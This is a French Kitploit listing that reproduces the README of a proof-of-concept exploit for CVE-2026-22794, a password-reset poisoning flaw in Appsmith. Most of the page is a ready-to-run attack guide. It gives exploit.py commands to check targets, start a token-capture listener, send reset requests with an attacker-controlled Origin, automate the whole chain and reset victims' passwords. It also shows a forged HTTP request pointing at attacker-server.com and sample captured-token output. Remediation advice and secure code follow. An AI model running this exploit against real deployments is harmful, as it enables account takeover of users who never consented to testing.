Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-22794-POC — 🔴 CVE-2026-22794 - Appsmith Réinitialisation de mot de passe et prise de contrôle de compte via injection d'en-tête Origin | PoC Exploit + Modèle Nuclei | Kitploit
Outils/GitHubGitHub/malikhamza7/cve-2026-22794-poc
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionAuthentification
GitHubmalikhamza7/cve-2026-22794-poc

CVE-2026-22794-POC

🔴 CVE-2026-22794 - Appsmith Réinitialisation de mot de passe et prise de contrôle de compte via injection d'en-tête Origin | PoC Exploit + Modèle Nuclei

Voir le dépôtSite web
7il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-22794 - Injection d'en-tête Origin dans Appsmith

Python Version CVE License

🔴 Vulnérabilité de sécurité critique

Détournement de lien de réinitialisation de mot de passe via manipulation de l'en-tête Origin

Ce dépôt contient une preuve de concept (PoC) pour CVE-2026-22794, une vulnérabilité critique dans Appsmith qui permet aux attaquants de détourner les jetons de réinitialisation de mot de passe et de prendre le contrôle total d'un compte.

📋 Résumé de la vulnérabilité

ChampValeur
ID CVECVE-2026-22794
Logiciel concernéAppsmith (versions antérieures au correctif)
Type de vulnérabilitéInjection d'en-tête Origin
ImpactPrise de contrôle totale du compte
Score CVSS9.1 (Critique)
Vecteur d'attaqueRéseau
Complexité de l'attaqueFaible
Privilèges requisAucun
Interaction utilisateurRequise (la victime clique sur le lien)

🎯 Description de la vulnérabilité

Appsmith utilise l'en-tête HTTP Origin sans validation pour construire les URL de réinitialisation de mot de passe et de vérification d'e-mail. Le code vulnérable attribue directement l'en-tête Origin à l'URL de base de réinitialisation du mot de passe :

root@kitploit:~
userPasswordDTO.setBaseUrl(originHeader);

Cela permet à un attaquant de :

  1. Déclencher une réinitialisation de mot de passe pour n'importe quelle adresse e-mail
  2. Injecter un en-tête Origin malveillant pointant vers un serveur contrôlé par l'attaquant
  3. Capturer le jeton de réinitialisation de mot de passe lorsque la victime clique sur le lien
  4. Utiliser le jeton pour réinitialiser le mot de passe de la victime et prendre le contrôle de son compte

🔥 Chaîne d'attaque

root@kitploit:~
┌─────────────────────────────────────────────────────────────────┐
│                     FLUX D'ATTAQUE                               │
└─────────────────────────────────────────────────────────────────┘

  ┌──────────┐                    ┌──────────┐                    ┌──────────┐
  │ ATTAQUANT│                    │ APPSMITH │                    │  VICTIME │
  └────┬─────┘                    └────┬─────┘                    └────┬─────┘
       │                               │                               │
       │ 1. POST /forgotPassword       │                               │
       │    Origin: attacker.com       │                               │
       │    email: [email protected]     │                               │
       │──────────────────────────────>│                               │
       │                               │                               │
       │                               │ 2. Envoi d'un e-mail avec     │
       │                               │    attacker.com/reset?token   │
       │                               │──────────────────────────────>│
       │                               │                               │
       │ 3. La victime clique sur le lien │                             │
       │<──────────────────────────────────────────────────────────────│
       │                               │                               │
       │ 4. Jeton capturé !            │                               │
       │                               │                               │
       │ 5. POST /resetPassword        │                               │
       │    token: STOLEN_TOKEN        │                               │
       │    password: attacker123      │                               │
       │──────────────────────────────>│                               │
       │                               │                               │
       │ 6. PRISE DE CONTRÔLE DU COMPTE ! ✓                            │
       │                               │                               │

📦 Installation

root@kitploit:~
# Cloner le dépôt
git clone https://github.com/MalikHamza7/CVE-2026-22794-POC
cd CVE-2026-22794-POC

# Installer les dépendances
pip install -r requirements.txt

🚀 Utilisation

Vérifier si la cible est vulnérable

root@kitploit:~
python exploit.py --target https://appsmith.target.com --check

Démarrer le serveur de capture de jetons

root@kitploit:~
python exploit.py --listen --port 8080

Envoyer une demande malveillante de réinitialisation de mot de passe

root@kitploit:~
python exploit.py \
    --target https://appsmith.target.com \
    --email [email protected] \
    --attacker-url https://your-server.com

Attaque automatisée complète

root@kitploit:~
python exploit.py \
    --target https://appsmith.target.com \
    --email [email protected] \
    --attacker-url https://your-server.com \
    --listen --port 8080

Utiliser le jeton capturé pour réinitialiser le mot de passe

root@kitploit:~
python exploit.py \
    --target https://appsmith.target.com \
    --reset-token CAPTURED_TOKEN \
    --new-password "NewP@ssw0rd!"

📸 Démonstration de l'attaque

Étape 1 : L'attaquant envoie une demande malveillante

root@kitploit:~
POST /api/v1/users/forgotPassword HTTP/1.1
Host: appsmith.target.com
Origin: https://attacker-server.com
Content-Type: application/json

{
  "email": "[email protected]"
}

Étape 2 : La victime reçoit un e-mail avec un lien malveillant

root@kitploit:~
Lien de réinitialisation du mot de passe : https://attacker-server.com/user/resetPassword?token=abc123xyz...

Étape 3 : L'attaquant capture le jeton

root@kitploit:~
[+] DEMANDE ENTRANTE CAPTURÉE !
[*] Chemin : /user/resetPassword?token=abc123xyz789...
[!!!] JETON DE RÉINITIALISATION DE MOT DE PASSE CAPTURÉ !
[!!!] Jeton : abc123xyz789...

Étape 4 : Prise de contrôle du compte

root@kitploit:~
[+] PRISE DE CONTRÔLE DU COMPTE RÉUSSIE !
[+] Le mot de passe a été réinitialisé à : NewP@ssw0rd!

🛡️ Correctif

Les organisations utilisant Appsmith devraient :

  1. Mettre à jour immédiatement vers la dernière version corrigée
  2. Valider les en-têtes Origin par rapport à une liste blanche de domaines autorisés
  3. Utiliser une configuration côté serveur pour générer les URL de réinitialisation de mot de passe
  4. Mettre en œuvre une vérification supplémentaire (par exemple, validation IP, expiration courte des jetons)

Exemple de code sécurisé

root@kitploit:~
// ❌ CODE VULNÉRABLE
userPasswordDTO.setBaseUrl(originHeader);

// ✅ CODE SÉCURISÉ
String configuredBaseUrl = applicationConfiguration.getBaseUrl();
// Ou valider par rapport à la liste blanche
if (!allowedOrigins.contains(originHeader)) {
    throw new InvalidOriginException("En-tête Origin invalide");
}
userPasswordDTO.setBaseUrl(configuredBaseUrl);

📁 Structure du dépôt

root@kitploit:~
CVE-2026-22794/
├── README.md           # Ce fichier
├── exploit.py          # Script d'exploitation principal
├── requirements.txt    # Dépendances Python
├── LICENSE             # Licence MIT
└── docs/
    └── technical_analysis.md  # Analyse technique détaillée de la vulnérabilité

⚠️ Avertissement légal

Cet outil est fourni uniquement à des fins de tests de sécurité autorisés et à des fins éducatives.

  • N'utilisez cet outil que contre des systèmes que vous possédez ou pour lesquels vous avez une autorisation écrite explicite de test
  • L'accès non autorisé à des systèmes informatiques est illégal
  • L'auteur n'est pas responsable de toute utilisation abusive de cet outil
  • Suivez toujours les pratiques de divulgation responsable

📄 Références

  • CVE-2026-22794
  • OWASP - Aide-mémoire sur le mot de passe oublié
  • CWE-346 : Erreur de validation d'origine

👤 Auteur

Chercheur en sécurité

  • GitHub : @MalikHamza7
  • LinkedIn : Votre profil LinkedIn

📜 Licence

Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.


⭐ Si vous avez trouvé cela utile, veuillez mettre une étoile sur le dépôt ! ⭐

Télécharger l’outil